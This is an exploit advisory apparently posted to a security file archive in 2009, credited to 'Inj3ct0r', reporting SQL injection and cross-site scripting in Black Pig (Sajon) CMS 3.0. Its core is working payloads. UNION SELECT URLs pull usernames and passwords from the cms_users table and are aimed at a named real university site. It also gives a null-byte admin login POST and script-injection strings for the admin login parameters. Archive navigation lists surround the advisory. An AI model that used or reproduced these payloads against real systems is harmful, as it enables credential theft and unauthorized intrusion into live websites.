Black Pig CMS 3.0 XSS / SQL Injection

Black Pig CMS 3.0 XSS / SQL Injection: Posted Aug 26, 2009; Authored by Inj3ct0r | Site Inj3ct0r.com; Black Pig CMS version 3.0 suffers from remote SQL injection and cross site scripting vulnerabilities.; tags | exploit, remote, vulnerability, xss, sql injection; SHA-256 | 9dc0cc6c72fe9c1de1d221d69b3e6454f4ea4929c8e0c582b4609b3c7c14e446; Download | Favorite | View

Black Pig CMS 3.0 XSS / SQL Injection

=============================================
Black Pig (Sajon) CMS 3.0 SQL Injection + XSS
=============================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

#[+] Discovered By   : Inj3ct0r
#[+] Site            : Inj3ct0r.com
#[+] support e-mail  : submit[at]inj3ct0r.com
#[+] visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net


Product : Black Pig (Sajon) CMS 3.0
site:  http://www.blackpig.co.uk/


Investigated the University of Cambridge. =]
The file name may change, but is vulnerable parameter key

1) SQL inj3ct0r

Example:

http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+username,2,password+from+cms_users--

http://www.enterprise.cam.ac.uk/archive.php?key=-24+union+select+version(),2,concat_ws(char(58),group_concat(username+separator+0x3a),group_concat(password+separator+0x3a))+from+cms_users--

SQL inj in admin, when authorization

Example:

POST 
formloginuser=%00 


2) XSS 

http://www.site.com/cms/admin.php 
POST 
action=login&gomodule=>"><script%20%0a%0d>alert(KU-KU,7750312847)%3B</Script> 
The same is true in goid,gopage 


Admin is:

site.com/cms/ 

Disclosure ways:

http://www.site.com/cms/admin.php 

  
in the login box set '

Table: cms_users 
Fields: username,password 

ThE End =]  Visit my proj3ct  :

http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net

# ~  - [ [ : Inj3ct0r : ] ]

Top Authors In Last 30 Days

Red Hat 236 files
Ubuntu 90 files
Gentoo 31 files
Debian 23 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Amit Roy 4 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,077)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,339)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,263)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,651)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

Black Pig CMS 3.0 XSS / SQL Injection

Black Pig CMS 3.0 XSS / SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Black Pig CMS 3.0 XSS / SQL Injection

Share This

Black Pig CMS 3.0 XSS / SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems